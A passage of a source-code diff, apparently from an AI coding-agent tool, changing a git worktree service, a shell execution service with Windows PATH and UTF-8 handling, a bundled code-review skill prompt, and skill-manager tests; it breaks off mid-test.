cleanupSession(sessionId: string): Promise<{ + success: boolean; + removedWorktrees: string[]; + removedBranches: string[]; + errors: string[]; + }> { + const result = { + success: true, + removedWorktrees: [] as string[], + removedBranches: [] as string[], + errors: [] as string[], + }; + + // Collect actual branch names from worktrees before removing them + const worktrees = await this.listWorktrees(sessionId); + const worktreeBranches = new Set( + worktrees.map((w) => w.branch).filter(Boolean), + ); + + // Remove all worktrees + for (const worktree of worktrees) { + const removeResult = await this.removeWorktree(worktree.path); + if (removeResult.success) { + result.removedWorktrees.push(worktree.name); + } else { + result.errors.push( + removeResult.error || `Failed to remove ${worktree.name}`, + ); + result.success = false; + } + } + + // Remove session directory + const sessionDir = GitWorktreeService.getSessionDir( + sessionId, + this.customBaseDir, + ); + try { + await fs.rm(sessionDir, { recursive: true, force: true }); + } catch (error) { + result.errors.push( + `Failed to remove session directory: ${error instanceof Error ? error.message : 'Unknown error'}`, + ); + } + + // Clean up branches that belonged to the worktrees + try { + for (const branchName of worktreeBranches) { + try { + await this.git.branch(['-D', branchName]); + result.removedBranches.push(branchName); + } catch { + // Branch might already be deleted, ignore + } + } + } catch { + // Ignore branch listing/deletion errors + } + + // Prune worktree references + try { + await this.git.raw(['worktree', 'prune']); + } catch { + // Ignore prune errors + } + + return result; + } + + /** + * Gets the diff between a worktree and its baseline state. + * Prefers the baseline commit (which includes the dirty state overlay) + * so the diff only shows the agent's changes. Falls back to the base branch + * when no baseline commit exists. + */ + async getWorktreeDiff( + worktreePath: string, + baseBranch?: string, + ): Promise { + const worktreeGit = simpleGit(worktreePath); + + const base = + (await this.resolveBaseline(worktreeGit)) ?? + baseBranch ?? + (await this.getCurrentBranch()); + + try { + return await this.withStagedChanges(worktreeGit, () => + worktreeGit.diff(['--binary', '--cached', base]), + ); + } catch (error) { + return `Error getting diff: ${error instanceof Error ? error.message : 'Unknown error'}`; + } + } + + /** + * Applies raw changes from a worktree back to the target working directory. + * + * Diffs from the baseline commit (which already includes the user's + * dirty state) so the patch only contains the agent's new changes. + * Falls back to merge-base when no baseline commit exists. + */ + async applyWorktreeChanges( + worktreePath: string, + targetPath?: string, + ): Promise<{ success: boolean; error?: string }> { + const target = targetPath || this.sourceRepoPath; + const worktreeGit = simpleGit(worktreePath); + const targetGit = simpleGit(target); + + try { + // Prefer the baseline commit (created during worktree setup after + // overlaying dirty state) so the patch excludes pre-existing edits. + let base = await this.resolveBaseline(worktreeGit); + const hasBaseline = !!base; + + if (!base) { + // Fallback: diff from merge-base + const targetHead = (await targetGit.revparse(['HEAD'])).trim(); + base = ( + await worktreeGit.raw(['merge-base', 'HEAD', targetHead]) + ).trim(); + } + + const patch = await this.withStagedChanges(worktreeGit, () => + worktreeGit.diff(['--binary', '--cached', base]), + ); + + if (!patch.trim()) { + return { success: true }; + } + + const patchFile = path.join( + this.getBaseDirForInstance(), + `.worktree-apply-${Date.now()}-${Math.random().toString(16).slice(2)}.patch`, + ); + await fs.mkdir(path.dirname(patchFile), { recursive: true }); + await fs.writeFile(patchFile, patch, 'utf-8'); + + try { + // When using the baseline, the target working tree already matches the + // patch pre-image (both have the dirty state), so a plain apply works. + // --3way is only needed for the merge-base fallback path where the + // pre-image may not match the working tree; it falls back to index + // blob lookup which would fail on baseline-relative patches. + const applyArgs = hasBaseline + ? ['apply', '--whitespace=nowarn', patchFile] + : ['apply', '--3way', '--whitespace=nowarn', patchFile]; + await targetGit.raw(applyArgs); + } finally { + await fs.rm(patchFile, { force: true }); + } + + return { success: true }; + } catch (error) { + return { + success: false, + error: `Failed to apply worktree changes: ${error instanceof Error ? error.message : 'Unknown error'}`, + }; + } + } + + /** + * Lists all sessions stored in the worktree base directory. + */ + static async listSessions(customBaseDir?: string): Promise< + Array<{ + sessionId: string; + createdAt: number; + sourceRepoPath: string; + worktreeCount: number; + }> + > { + const baseDir = GitWorktreeService.getBaseDir(customBaseDir); + const sessions: Array<{ + sessionId: string; + createdAt: number; + sourceRepoPath: string; + worktreeCount: number; + }> = []; + + try { + const entries = await fs.readdir(baseDir, { withFileTypes: true }); + + for (const entry of entries) { + if (entry.isDirectory()) { + const configPath = path.join(baseDir, entry.name, 'config.json'); + try { + const configContent = await fs.readFile(configPath, 'utf-8'); + const config = JSON.parse(configContent) as SessionConfigFile; + + const worktreesDir = path.join(baseDir, entry.name, WORKTREES_DIR); + let worktreeCount = 0; + try { + const worktreeEntries = await fs.readdir(worktreesDir); + worktreeCount = worktreeEntries.length; + } catch { + // Ignore if worktrees dir doesn't exist + } + + sessions.push({ + sessionId: entry.name, + createdAt: config.createdAt || Date.now(), + sourceRepoPath: config.sourceRepoPath || '', + worktreeCount, + }); + } catch { + // Ignore sessions without valid config + } + } + } + + return sessions.sort((a, b) => b.createdAt - a.createdAt); + } catch { + return []; + } + } + + /** + * Finds the baseline commit in a worktree, if one exists. + * Returns the commit SHA, or null if not found. + */ + private async resolveBaseline( + worktreeGit: SimpleGit, + ): Promise { + try { + const sha = ( + await worktreeGit.raw([ + 'log', + '--grep', + BASELINE_COMMIT_MESSAGE, + '--format=%H', + '-1', + ]) + ).trim(); + return sha || null; + } catch { + return null; + } + } + + /** Stages all changes, runs a callback, then resets the index. */ + private async withStagedChanges( + git: SimpleGit, + fn: () => Promise, + ): Promise { + await git.add(['--all']); + try { + return await fn(); + } finally { + try { + await git.raw(['reset']); + } catch { + // Best-effort: ignore reset failures + } + } + } + + private sanitizeName(name: string): string { + // Replace invalid characters with hyphens + return name + .toLowerCase() + .replace(/[^a-z0-9-]/g, '-') + .replace(/-+/g, '-') + .replace(/^-|-$/g, ''); + } + + private async pathExists(p: string): Promise { + try { + await fs.access(p); + return true; + } catch { + return false; + } + } +} diff --git a/packages/core/src/services/shellExecutionService.test.ts b/packages/core/src/services/shellExecutionService.test.ts index 96055840f..5dae23a2a 100644 --- a/packages/core/src/services/shellExecutionService.test.ts +++ b/packages/core/src/services/shellExecutionService.test.ts @@ -4,15 +4,29 @@ * SPDX-License-Identifier: Apache-2.0 */ -import { vi, describe, it, expect, beforeEach, type Mock } from 'vitest'; +import { + vi, + describe, + it, + expect, + beforeEach, + afterEach, + type Mock, +} from 'vitest'; import EventEmitter from 'node:events'; import type { Readable } from 'node:stream'; import { type ChildProcess } from 'node:child_process'; +import pkg from '@xterm/headless'; import type { ShellOutputEvent } from './shellExecutionService.js'; import { ShellExecutionService } from './shellExecutionService.js'; import type { AnsiOutput } from '../utils/terminalSerializer.js'; +const { Terminal } = pkg; + // Hoisted Mocks +const mockGetSystemEncoding = vi.hoisted(() => + vi.fn().mockReturnValue('utf-8'), +); const mockPtySpawn = vi.hoisted(() => vi.fn()); const mockCpSpawn = vi.hoisted(() => vi.fn()); const mockIsBinary = vi.hoisted(() => vi.fn()); @@ -64,6 +78,10 @@ vi.mock('../utils/terminalSerializer.js', () => ({ vi.mock('../utils/shell-utils.js', () => ({ getShellConfiguration: mockGetShellConfiguration, })); +vi.mock('../utils/systemEncoding.js', () => ({ + getCachedEncodingForBuffer: vi.fn().mockReturnValue('utf-8'), + getSystemEncoding: mockGetSystemEncoding, +})); const mockProcessKill = vi .spyOn(process, 'kill') @@ -77,6 +95,13 @@ const shellExecutionConfig = { disableDynamicLineTrimming: true, }; +const WINDOWS_SYSTEM_PATH = 'C:\\Windows\\System32;C:\\Shared\\Tools'; +const WINDOWS_USER_PATH = 'C:\\Users\\tester\\bin;C:\\Shared\\Tools'; +const EXPECTED_MERGED_WINDOWS_PATH = + 'C:\\Windows\\System32;C:\\Shared\\Tools;C:\\Users\\tester\\bin'; + +let originalProcessEnv: NodeJS.ProcessEnv; + const createExpectedAnsiOutput = (text: string | string[]): AnsiOutput => { const lines = Array.isArray(text) ? text : text.split('\n'); const expected: AnsiOutput = Array.from( @@ -97,6 +122,19 @@ const createExpectedAnsiOutput = (text: string | string[]): AnsiOutput => { return expected; }; +const setupConflictingPathEnv = () => { + process.env = { + ...originalProcessEnv, + PATH: WINDOWS_SYSTEM_PATH, + Path: WINDOWS_USER_PATH, + }; +}; + +const expectNormalizedWindowsPathEnv = (env: NodeJS.ProcessEnv) => { + expect(env['PATH']).toBe(EXPECTED_MERGED_WINDOWS_PATH); + expect(env['Path']).toBeUndefined(); +}; + describe('ShellExecutionService', () => { let mockPtyProcess: EventEmitter & { pid: number; @@ -119,6 +157,7 @@ describe('ShellExecutionService', () => { beforeEach(() => { vi.clearAllMocks(); + originalProcessEnv = process.env; mockIsBinary.mockReturnValue(false); mockPlatform.mockReturnValue('linux'); @@ -157,6 +196,11 @@ describe('ShellExecutionService', () => { mockPtySpawn.mockReturnValue(mockPtyProcess); }); + afterEach(() => { + process.env = originalProcessEnv; + vi.unstubAllEnvs(); + }); + // Helper function to run a standard execution simulation const simulateExecution = async ( command: string, @@ -258,6 +302,68 @@ describe('ShellExecutionService', () => { await handle.result; expect(handle.pid).toBe(12345); }); + + it('should preserve full raw output when terminal writes are backlogged', async () => { + vi.useFakeTimers(); + const originalWrite = Terminal.prototype.write; + const delayedWrite = vi + .spyOn(Terminal.prototype, 'write') + .mockImplementation(function ( + this: pkg.Terminal, + data: string | Uint8Array, + callback?: () => void, + ) { + setTimeout(() => { + originalWrite.call(this, data, callback); + }, 10); + }); + + try { + const abortController = new AbortController(); + const handle = await ShellExecutionService.execute( + 'fast-output', + '/test/dir', + onOutputEventMock, + abortController.signal, + true, + shellExecutionConfig, + ); + + const onData = mockPtyProcess.onData.mock.calls[0][0] as ( + data: string, + ) => void; + for (let i = 1; i <= 500; i++) { + onData(`Line ${String(i).padStart(4, '0')}\n`); + } + + const resultPromise = handle.result; + mockPtyProcess.onExit.mock.calls[0][0]({ exitCode: 0, signal: null }); + + await vi.advanceTimersByTimeAsync(250); + const result = await resultPromise; + + const lines = result.output.split('\n'); + expect(lines).toHaveLength(500); + expect(lines[0]).toBe('Line 0001'); + expect(lines[499]).toBe('Line 0500'); + } finally { + delayedWrite.mockRestore(); + vi.clearAllTimers(); + vi.useRealTimers(); + } + }); + + it('should collapse carriage-return progress updates in final output', async () => { + const { result } = await simulateExecution('progress-output', (pty) => { + pty.onData.mock.calls[0][0]('Compressing objects: 14% (1/7)\r'); + pty.onData.mock.calls[0][0]('Compressing objects: 28% (2/7)\r'); + pty.onData.mock.calls[0][0]('Compressing objects: 42% (3/7)\r'); + pty.onData.mock.calls[0][0]('Compressing objects: 100% (7/7), done.\n'); + pty.onExit.mock.calls[0][0]({ exitCode: 0, signal: null }); + }); + + expect(result.output).toBe('Compressing objects: 100% (7/7), done.'); + }); }); describe('pty interaction', () => { @@ -272,17 +378,28 @@ describe('ShellExecutionService', () => { it('should write to the pty and trigger a render', async () => { vi.useFakeTimers(); - await simulateExecution('interactive-app', (pty) => { - ShellExecutionService.writeToPty(pty.pid!, 'input'); - pty.onExit.mock.calls[0][0]({ exitCode: 0, signal: null }); - }); + try { + const abortController = new AbortController(); + const handle = await ShellExecutionService.execute( + 'interactive-app', + '/test/dir', + onOutputEventMock, + abortController.signal, + true, + shellExecutionConfig, + ); - expect(mockPtyProcess.write).toHaveBeenCalledWith('input'); - // Use fake timers to check for the delayed render - await vi.advanceTimersByTimeAsync(17); - // The render will cause an output event - expect(onOutputEventMock).toHaveBeenCalled(); - vi.useRealTimers(); + ShellExecutionService.writeToPty(handle.pid!, 'input'); + mockPtyProcess.onExit.mock.calls[0][0]({ exitCode: 0, signal: null }); + + await vi.runAllTimersAsync(); + await handle.result; + + expect(mockPtyProcess.write).toHaveBeenCalledWith('input'); + expect(onOutputEventMock).toHaveBeenCalled(); + } finally { + vi.useRealTimers(); + } }); it('should resize the pty and the headless terminal', async () => { @@ -441,7 +558,7 @@ describe('ShellExecutionService', () => { }); }); - it('should use PowerShell on Windows with array args', async () => { + it('should use PowerShell on Windows with array args and UTF-8 prefix', async () => { mockPlatform.mockReturnValue('win32'); mockGetShellConfiguration.mockReturnValue({ executable: 'powershell.exe', @@ -452,9 +569,14 @@ describe('ShellExecutionService', () => { pty.onExit.mock.calls[0][0]({ exitCode: 0, signal: null }), ); + // PowerShell commands on Windows are prefixed with UTF-8 output encoding expect(mockPtySpawn).toHaveBeenCalledWith( 'powershell.exe', - ['-NoProfile', '-Command', 'Test-Path "C:\\Temp\\"'], + [ + '-NoProfile', + '-Command', + '[Console]::OutputEncoding=[System.Text.Encoding]::UTF8;Test-Path "C:\\Temp\\"', + ], expect.any(Object), ); mockGetShellConfiguration.mockReturnValue({ @@ -464,6 +586,18 @@ describe('ShellExecutionService', () => { }); }); + it('should normalize PATH-like env keys on Windows for pty execution', async () => { + mockPlatform.mockReturnValue('win32'); + setupConflictingPathEnv(); + + await simulateExecution('dir', (pty) => + pty.onExit.mock.calls[0][0]({ exitCode: 0, signal: null }), + ); + + const spawnOptions = mockPtySpawn.mock.calls[0][2]; + expectNormalizedWindowsPathEnv(spawnOptions.env); + }); + it('should use bash on Linux', async () => { mockPlatform.mockReturnValue('linux'); await simulateExecution('ls "foo bar"', (pty) => @@ -571,6 +705,7 @@ describe('ShellExecutionService child_process fallback', () => { beforeEach(() => { vi.clearAllMocks(); + originalProcessEnv = process.env; mockIsBinary.mockReturnValue(false); mockPlatform.mockReturnValue('linux'); @@ -592,6 +727,11 @@ describe('ShellExecutionService child_process fallback', () => { mockCpSpawn.mockReturnValue(mockChildProcess); }); + afterEach(() => { + process.env = originalProcessEnv; + vi.unstubAllEnvs(); + }); + // Helper function to run a standard execution simulation const simulateExecution = async ( command: string, @@ -890,7 +1030,7 @@ describe('ShellExecutionService child_process fallback', () => { }); }); - it('should use PowerShell without windowsVerbatimArguments on Windows', async () => { + it('should use PowerShell with UTF-8 prefix without windowsVerbatimArguments on Windows', async () => { mockPlatform.mockReturnValue('win32'); mockGetShellConfiguration.mockReturnValue({ executable: 'powershell.exe', @@ -901,9 +1041,14 @@ describe('ShellExecutionService child_process fallback', () => { cp.emit('exit', 0, null), ); + // PowerShell commands on Windows are prefixed with UTF-8 output encoding expect(mockCpSpawn).toHaveBeenCalledWith( 'powershell.exe', - ['-NoProfile', '-Command', 'Test-Path "C:\\Temp\\"'], + [ + '-NoProfile', + '-Command', + '[Console]::OutputEncoding=[System.Text.Encoding]::UTF8;Test-Path "C:\\Temp\\"', + ], expect.objectContaining({ detached: false, windowsHide: true, @@ -917,6 +1062,16 @@ describe('ShellExecutionService child_process fallback', () => { }); }); + it('should normalize PATH-like env keys on Windows for child_process fallback', async () => { + mockPlatform.mockReturnValue('win32'); + setupConflictingPathEnv(); + + await simulateExecution('dir', (cp) => cp.emit('exit', 0, null)); + + const spawnOptions = mockCpSpawn.mock.calls[0][2]; + expectNormalizedWindowsPathEnv(spawnOptions.env); + }); + it('should use bash and detached process group on Linux', async () => { mockPlatform.mockReturnValue('linux'); await simulateExecution('ls "foo bar"', (cp) => cp.emit('exit', 0, null)); diff --git a/packages/core/src/services/shellExecutionService.ts b/packages/core/src/services/shellExecutionService.ts index d43d0f190..e943275bd 100644 --- a/packages/core/src/services/shellExecutionService.ts +++ b/packages/core/src/services/shellExecutionService.ts @@ -22,6 +22,103 @@ import { const { Terminal } = pkg; const SIGKILL_TIMEOUT_MS = 200; +const WINDOWS_PATH_DELIMITER = ';'; +let cachedWindowsPathFingerprint: string | undefined; +let cachedMergedWindowsPath: string | undefined; + +function mergeWindowsPathValues( + env: NodeJS.ProcessEnv, + pathKeys: string[], +): string | undefined { + const mergedEntries: string[] = []; + const seenEntries = new Set(); + + for (const key of pathKeys) { + const value = env[key]; + if (value === undefined) { + continue; + } + + for (const entry of value.split(WINDOWS_PATH_DELIMITER)) { + if (seenEntries.has(entry)) { + continue; + } + seenEntries.add(entry); + mergedEntries.push(entry); + } + } + + return mergedEntries.length > 0 + ? mergedEntries.join(WINDOWS_PATH_DELIMITER) + : undefined; +} + +function getWindowsPathFingerprint( + env: NodeJS.ProcessEnv, + pathKeys: string[], +): string { + return pathKeys.map((key) => `${key}=${env[key] ?? ''}`).join('\0'); +} + +function normalizePathEnvForWindows(env: NodeJS.ProcessEnv): NodeJS.ProcessEnv { + if (os.platform() !== 'win32') { + return env; + } + + const normalized: NodeJS.ProcessEnv = { ...env }; + const pathKeys = Object.keys(normalized).filter( + (key) => key.toLowerCase() === 'path', + ); + + if (pathKeys.length === 0) { + return normalized; + } + + const orderedPathKeys = [...pathKeys].sort((left, right) => { + if (left === 'PATH') { + return -1; + } + if (right === 'PATH') { + return 1; + } + return left.localeCompare(right); + }); + + const fingerprint = getWindowsPathFingerprint(normalized, orderedPathKeys); + const canonicalValue = + fingerprint === cachedWindowsPathFingerprint + ? cachedMergedWindowsPath + : mergeWindowsPathValues(normalized, orderedPathKeys); + + if (fingerprint !== cachedWindowsPathFingerprint) { + cachedWindowsPathFingerprint = fingerprint; + cachedMergedWindowsPath = canonicalValue; + } + + for (const key of pathKeys) { + if (key !== 'PATH') { + delete normalized[key]; + } + } + + if (canonicalValue !== undefined) { + normalized['PATH'] = canonicalValue; + } + + return normalized; +} + +/** + * On Windows with PowerShell, prefix the command with a statement that forces + * UTF-8 output encoding so that CJK and other non-ASCII characters are emitted + * as UTF-8 regardless of the system codepage. + */ +function applyPowerShellUtf8Prefix(command: string, shell: string): string { + if (os.platform() === 'win32' && shell === 'powershell') { + return '[Console]::OutputEncoding=[System.Text.Encoding]::UTF8;' + command; + } + return command; +} /** A structured result from a shell command execution. */ export interface ShellExecutionResult { @@ -93,12 +190,32 @@ const getFullBufferText = (terminal: pkg.Terminal): string => { const lines: string[] = []; for (let i = 0; i < buffer.length; i++) { const line = buffer.getLine(i); - const lineContent = line ? line.translateToString() : ''; + const lineContent = line ? line.translateToString(true) : ''; lines.push(lineContent); } return lines.join('\n').trimEnd(); }; +const replayTerminalOutput = async ( + output: string, + cols: number, + rows: number, +): Promise => { + const replayTerminal = new Terminal({ + allowProposedApi: true, + cols, + rows, + scrollback: 10000, + convertEol: true, + }); + + await new Promise((resolve) => { + replayTerminal.write(output, () => resolve()); + }); + + return getFullBufferText(replayTerminal); +}; + interface ProcessCleanupStrategy { killPty(pid: number, pty: ActivePty): void; killChildProcesses(pids: Set): void; @@ -225,6 +342,7 @@ export class ShellExecutionService { try { const isWindows = os.platform() === 'win32'; const { executable, argsPrefix, shell } = getShellConfiguration(); + commandToExecute = applyPowerShellUtf8Prefix(commandToExecute, shell); const shellArgs = [...argsPrefix, commandToExecute]; // Note: CodeQL flags this as js/shell-command-injection-from-environment. @@ -241,7 +359,7 @@ export class ShellExecutionService { detached: !isWindows, windowsHide: isWindows, env: { - ...process.env, + ...normalizePathEnvForWindows(process.env), QWEN_CODE: '1', TERM: 'xterm-256color', PAGER: 'cat', @@ -424,6 +542,8 @@ export class ShellExecutionService { const cols = shellExecutionConfig.terminalWidth ?? 80; const rows = shellExecutionConfig.terminalHeight ?? 30; const { executable, argsPrefix, shell } = getShellConfiguration(); + commandToExecute = applyPowerShellUtf8Prefix(commandToExecute, shell); + // On Windows with cmd.exe, pass args as a single string instead of // an array. node-pty's argsToCommandLine re-quotes array elements // that contain spaces, which mangles user-provided quoted arguments @@ -445,7 +565,7 @@ export class ShellExecutionService { cols, rows, env: { - ...process.env, + ...normalizePathEnvForWindows(process.env), QWEN_CODE: '1', TERM: 'xterm-256color', PAGER: shellExecutionConfig.pager ?? 'cat', @@ -474,6 +594,7 @@ export class ShellExecutionService { let isStreamingRawContent = true; const MAX_SNIFF_SIZE = 4096; let sniffedBytes = 0; + let totalBytesReceived = 0; let isWriting = false; let hasStartedOutput = false; let renderTimeout: NodeJS.Timeout | null = null; @@ -588,21 +709,31 @@ export class ShellExecutionService { } }); + const ensureDecoder = (data: Buffer) => { + if (decoder) { + return; + } + + const encoding = getCachedEncodingForBuffer(data); + try { + decoder = new TextDecoder(encoding); + } catch { + decoder = new TextDecoder('utf-8'); + } + }; + const handleOutput = (data: Buffer) => { + // Capture raw output immediately. Rendering the headless terminal is + // slower than appending a Buffer, and rapid PTY output can otherwise + // overrun the render queue before finalize() races on exit. + ensureDecoder(data); + outputChunks.push(data); + totalBytesReceived += data.length; + const bytesReceived = totalBytesReceived; + processingChain = processingChain.then( () => new Promise((resolve) => { - if (!decoder) { - const encoding = getCachedEncodingForBuffer(data); - try { - decoder = new TextDecoder(encoding); - } catch { - decoder = new TextDecoder('utf-8'); - } - } - - outputChunks.push(data); - if (isStreamingRawContent && sniffedBytes < MAX_SNIFF_SIZE) { const sniffBuffer = Buffer.concat(outputChunks.slice(0, 20)); sniffedBytes = sniffBuffer.length; @@ -614,7 +745,7 @@ export class ShellExecutionService { } if (isStreamingRawContent) { - const decodedChunk = decoder.decode(data, { stream: true }); + const decodedChunk = decoder!.decode(data, { stream: true }); isWriting = true; headlessTerminal.write(decodedChunk, () => { render(); @@ -622,13 +753,9 @@ export class ShellExecutionService { resolve(); }); } else { - const totalBytes = outputChunks.reduce( - (sum, chunk) => sum + chunk.length, - 0, - ); onOutputEvent({ type: 'binary_progress', - bytesReceived: totalBytes, + bytesReceived, }); resolve(); } @@ -647,13 +774,40 @@ export class ShellExecutionService { abortSignal.removeEventListener('abort', abortHandler); this.activePtys.delete(ptyProcess.pid); - const finalize = () => { + const finalize = async () => { render(true); const finalBuffer = Buffer.concat(outputChunks); + let fullOutput = ''; + + try { + if (isStreamingRawContent) { + // Re-decode the full buffer with proper encoding detection. + // The streaming decoder used the first-chunk heuristic which + // can misdetect when early output is ASCII-only but later + // output is in a different encoding (e.g. GBK). + const finalEncoding = getCachedEncodingForBuffer(finalBuffer); + const decodedOutput = new TextDecoder(finalEncoding).decode( + finalBuffer, + ); + fullOutput = await replayTerminalOutput( + decodedOutput, + cols, + rows, + ); + } else { + fullOutput = getFullBufferText(headlessTerminal); + } + } catch { + try { + fullOutput = getFullBufferText(headlessTerminal); + } catch { + // Ignore fallback rendering errors and resolve with empty text. + } + } resolve({ rawOutput: finalBuffer, - output: getFullBufferText(headlessTerminal), + output: fullOutput, exitCode, signal: signal ?? null, error, @@ -665,16 +819,20 @@ export class ShellExecutionService { }); }; - // Always try to flush pending terminal writes before - // finalizing so result.output is as complete as possible. - // Race against abort or a short timeout to avoid hanging. - const processingComplete = processingChain.then(() => 'processed'); - const deadline = new Promise<'timeout'>((res) => - setTimeout(() => res('timeout'), SIGKILL_TIMEOUT_MS), + // Give any last onData callbacks a chance to run before finalizing. + // onExit can arrive slightly before late PTY data is processed. + const flushChain = () => processingChain.then(() => {}); + const deadline = new Promise((res) => + setTimeout(res, SIGKILL_TIMEOUT_MS), ); + const drain = () => + new Promise((res) => setImmediate(res)).then(flushChain); - void Promise.race([processingComplete, deadline]).then(() => { - finalize(); + void Promise.race([ + flushChain().then(drain).then(drain), + deadline, + ]).then(() => { + void finalize(); }); }, ); diff --git a/packages/core/src/skills/bundled/review/SKILL.md b/packages/core/src/skills/bundled/review/SKILL.md index 14e5f27e6..957031c7a 100644 --- a/packages/core/src/skills/bundled/review/SKILL.md +++ b/packages/core/src/skills/bundled/review/SKILL.md @@ -15,15 +15,16 @@ You are an expert code reviewer. Your job is to review code changes and provide ## Step 1: Determine what to review -Based on the arguments provided: +Your goal here is to understand the scope of changes so you can dispatch agents effectively in Step 2. Based on the arguments provided: - **No arguments**: Review local uncommitted changes - Run `git diff` and `git diff --staged` to get all changes - If both diffs are empty, inform the user there are no changes to review and stop here — do not proceed to the review agents - **PR number or URL** (e.g., `123` or `https://github.com/.../pull/123`): - - Run `gh pr view ` to get PR details - - Run `gh pr diff ` to get the diff + - Save the current branch name, stash any local changes (`git stash --include-untracked`), then `gh pr checkout ` + - Run `gh pr view ` and save the output (title, description, base branch, etc.) to a temp file (e.g., `/tmp/pr-review-context.md`) so agents can read it without you repeating it in each prompt + - Note the base branch (e.g., `main`) — agents will use `git diff ...HEAD` to get the diff and can read files directly - **File path** (e.g., `src/foo.ts`): - Run `git diff HEAD -- ` to get recent changes @@ -33,6 +34,8 @@ Based on the arguments provided: Launch **four parallel review agents** to analyze the changes from different angles. Each agent should focus exclusively on its dimension. +**IMPORTANT**: Do NOT paste the full diff into each agent's prompt — this duplicates it 4x. Instead, give each agent the command to obtain the diff, a concise summary of what the changes are about, and its review focus. Each agent can read files and search the codebase on its own. + ### Agent 1: Correctness & Security Focus areas: @@ -77,9 +80,11 @@ Focus areas: - Unexpected side effects or hidden coupling - Anything else that looks off — trust your instincts -## Step 3: Aggregate and present findings +## Step 3: Restore environment and present findings -Combine results from all four agents into a single, well-organized review. Use this format: +If you checked out a PR branch in Step 1, restore the original state first: check out the original branch, `git stash pop` if changes were stashed, and remove the temp file. + +Then combine results from all four agents into a single, well-organized review. Use this format: ### Summary diff --git a/packages/core/src/skills/skill-manager.test.ts b/packages/core/src/skills/skill-manager.test.ts index 272d3001d..639234577 100644 --- a/packages/core/src/skills/skill-manager.test.ts +++ b/packages/core/src/skills/skill-manager.test.ts @@ -73,6 +73,14 @@ describe('SkillManager', () => { if (yamlString.includes('name: regular-skill')) { return { name: 'regular-skill', description: 'A regular skill' }; } + if (yamlString.includes('name: shared-skill')) { + const desc = yamlString.includes('From qwen dir') + ? 'From qwen dir' + : yamlString.includes('From agent dir') + ? 'From agent dir' + : 'A shared skill'; + return { name: 'shared-skill', description: desc }; + } if (!yamlString.includes('name:')) { return { description: 'A test skill' }; // Missing name case } @@ -391,42 +399,61 @@ You are a helpful assistant. describe('listSkills', () => { beforeEach(() => { - // Mock directory listing for skills directories (with Dirent objects) - vi.mocked(fs.readdir) - .mockResolvedValueOnce([ - { - name: 'skill1', - isDirectory: () => true, - isFile: () => false, - isSymbolicLink: () => false, - }, - { - name: 'skill2', - isDirectory: () => true, - isFile: () => false, - isSymbolicLink: () => false, - }, - { - name: 'not-a-dir.txt', - isDirectory: () => false, - isFile: () => true, - isSymbolicLink: () => false, - }, - ] as unknown as Awaited>) - .mockResolvedValueOnce([ - { - name: 'skill3', - isDirectory: () => true, - isFile: () => false, - isSymbolicLink: () => false, - }, - { - name: 'skill1', - isDirectory: () => true, - isFile: () => false, - isSymbolicLink: () => false, - }, - ] as unknown as Awaited>); + // Mock directory listing based on path to handle multiple base dirs per level. + // Use path.join to construct expected paths so separators match on all platforms. + const projectQwenSkillsDir = path.join( + '/test/project', + '.qwen', + 'skills', + ); + const userQwenSkillsDir = path.join('/home/user', '.qwen', 'skills'); + + // eslint-disable-next-line @typescript-eslint/no-explicit-any + vi.mocked(fs.readdir).mockImplementation((dirPath: any) => { + const pathStr = String(dirPath); + if (pathStr === projectQwenSkillsDir) { + return Promise.resolve([ + { + name: 'skill1', + isDirectory: () => true, + isFile: () => false, + isSymbolicLink: () => false, + }, + { + name: 'skill2', + isDirectory: () => true, + isFile: () => false, + isSymbolicLink: () => false, + }, + { + name: 'not-a-dir.txt', + isDirectory: () => false, + isFile: () => true, + isSymbolicLink: () => false, + }, + ] as unknown as Awaited>); + } + if (pathStr === userQwenSkillsDir) { + return Promise.resolve([ + { + name: 'skill3', + isDirectory: () => true, + isFile: () => false, + isSymbolicLink: () => false, + }, + { + name: 'skill1', + isDirectory: () => true, + isFile: () => false, + isSymbolicLink: () => false, + }, + ] as unknown as Awaited>); + } + // Other provider dirs (.agent, .cursor, .codex, .claude) return empty + return Promise.resolve( + [] as unknown as Awaited>, + ); + }); vi.mocked(fs.access).mockResolvedValue(undefined); @@ -483,6 +510,66 @@ Skill 3 content`); expect(projectSkills.every((s) => s.level === 'project')).toBe(true); }); + it('should deduplicate same-name skills across provider dirs within a level', async () => { + // Override readdir to return the same skill name from both .qwen and .agent dirs + vi.mocked(fs.readdir).mockReset(); + const projectQwenDir = path.join('/test/project', '.qwen', 'skills'); + const projectAgentDir = path.join('/test/project', '.agent', 'skills'); + + // eslint-disable-next-line @typescript-eslint/no-explicit-any + vi.mocked(fs.readdir).mockImplementation((dirPath: any) => { + const pathStr = String(dirPath); + if (pathStr === projectQwenDir) { + return Promise.resolve([ + { + name: 'shared-skill', + isDirectory: () => true, + isFile: () => false, + isSymbolicLink: () => false, + }, + ] as unknown as Awaited>); + } + if (pathStr === projectAgentDir) { + return Promise.resolve([ + { + name: 'shared-skill', + isDirectory: () => true, + isFile: () => false, + isSymbolicLink: () => false, + }, + ] as unknown as Awaited>); + } + return Promise.resolve( + [] as unknown as Awaited>, + ); + }); + + vi.mocked(fs.readFile).mockImplementation((filePath) => { + const pathStr = String(filePath); + if (pathStr.includes('.qwen') && pathStr.includes('shared-skill')) { + return Promise.resolve( + `---\nname: shared-skill\ndescription: From qwen dir\n---\nQwen content`, + ); + } + if (pathStr.includes('.agent') && pathStr.includes('shared-skill')) { + return Promise.resolve( + `---\nname: shared-skill\ndescription: From agent dir\n---\nAgent content`, + ); + } + return Promise.reject(new Error('File not found')); + }); + + const skills = await manager.listSkills({ + level: 'project', + force: true, + }); + + // Only one instance should remain, from .qwen (first in PROVIDER_CONFIG_DIRS) + expect(skills).toHaveLength(1); + expect(skills[0].name).toBe('shared-skill'); + expect(skills[0].description).toBe('From qwen dir'); + }); + it('should handle empty directories', async () => { vi.mocked(fs.readdir).mockReset(); vi.mocked(fs.readdir).mockResolvedValue( @@ -504,27 +591,33 @@ Skill 3 content`); }); }); - describe('getSkillsBaseDir', () => { - it('should return project-level base dir', () => { - const baseDir = manager.getSkillsBaseDir('project'); + describe('getSkillsBaseDirs', () => { + it('should return all project-level base dirs', () => { + const baseDirs = manager.getSkillsBaseDirs('project'); - expect(baseDir).toBe(path.join('/test/project', '.qwen', 'skills')); + expect(baseDirs).toHaveLength(2); + expect(baseDirs).toContain(path.join('/test/project', '.qwen', 'skills')); + expect(baseDirs).toContain( + path.join('/test/project', '.agent', 'skills'), + ); }); - it('should return user-level base dir', () => { - const baseDir = manager.getSkillsBaseDir('user'); + it('should return all user-level base dirs', () => { + const baseDirs = manager.getSkillsBaseDirs('user'); - 